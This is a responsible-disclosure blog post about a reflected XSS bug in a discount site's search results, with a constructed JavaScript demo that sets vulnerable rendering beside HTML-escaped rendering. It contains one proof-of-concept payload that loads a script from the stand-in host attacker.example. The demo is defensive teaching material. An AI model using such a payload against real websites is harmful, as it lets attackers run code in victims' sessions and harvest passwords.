Responsible Disclosure - XSS Flaw at LetsSaveMoney.com


Another day, another bug!

LetsSaveMoney.com is a "money saving" site. It offers discounts on a wide range of products and services, and is financed through affiliate marketing.

My Trade Union, Prospect, has just launched a white-labelled "Members' Rewards" based on LetsSaveMoney - that's how I came across this bug.

It's a depressingly familiar story - reflected XSS. Do a search which includes some HTML and watch it being echoed back to the user, unencoded, as part of the results page.

[Screenshot: Lets Save Money XSS]

Once an attacker can get a page to include their own markup, in particular a script loaded from a server they control, it's game over for security. They can run arbitrary JavaScript in the victim's session, show a fake login prompt to harvest the user's password, display unauthorised images, etc.
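To make the failure concrete, here is an added example (my own constructed illustration, not LetsSaveMoney's code): a minimal search results page rendered first the way the bug works, with the query concatenated straight into the HTML, and then the way it should be, with every untrusted value HTML-encoded. The offer list, the `attacker.example` host and the function names are all assumptions for the sake of the demo.

```javascript
// Added example, not code from the affected site. Shows a reflected-XSS
// search page in its vulnerable form and its hardened form.

// HTML-escape a string for use in element content and quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Constructed sample catalogue standing in for the site's discount listings.
const OFFERS = ['10% off broadband', '2-for-1 cinema tickets', 'Free gym trial'];

function findOffers(q) {
  const needle = String(q).toLowerCase();
  return OFFERS.filter((o) => o.toLowerCase().includes(needle));
}

// VULNERABLE: the search term is dropped straight into the page, so any
// markup in the query is parsed as markup by the browser.
function renderResultsVulnerable(q) {
  const items = findOffers(q).map((o) => `<li>${o}</li>`).join('');
  return `<h1>Results for "${q}"</h1><ul>${items}</ul>`;
}

// FIXED: every untrusted value is HTML-encoded before it lands in the page,
// so the query is displayed as text and never interpreted as markup.
function renderResultsSafe(q) {
  const items = findOffers(q).map((o) => `<li>${escapeHtml(o)}</li>`).join('');
  return `<h1>Results for "${escapeHtml(q)}"</h1><ul>${items}</ul>`;
}

// Crude check used only to illustrate the difference: does the rendered
// page contain a script tag that the query smuggled in?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed proof-of-concept payload of the kind the post describes:
// pulling in a script from a host the attacker controls (assumed hostname).
const PAYLOAD = '<script src="https://attacker.example/x.js"></script>';

console.log('vulnerable:', renderResultsVulnerable(PAYLOAD));
console.log('fixed:     ', renderResultsSafe(PAYLOAD));
```

Encoding on output is the fix that actually closes the hole; input filtering alone is easy to bypass, and a Content-Security-Policy that blocks script from unknown origins is a useful second layer but not a substitute.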

I posted a report on XSSposed and alerted LetsSaveMoney via their "Contact Us" form.

Impressively, I received an email back a few minutes later. I provided the details over email and the site was fixed an hour later!

That's an excellent response time.

If you run a website, familiarise yourself with OWASP's Top 10 Web Vulnerabilities. If you're a worker in a high-tech industry, you should consider joining Prospect as your Trade Union.

Bounty

While I neither asked for, nor expected, a reward - I was delighted to receive an Xmas gift hamper as a token of their appreciation.
[Photo: Bug Bounty Hamper]
Hurrah!
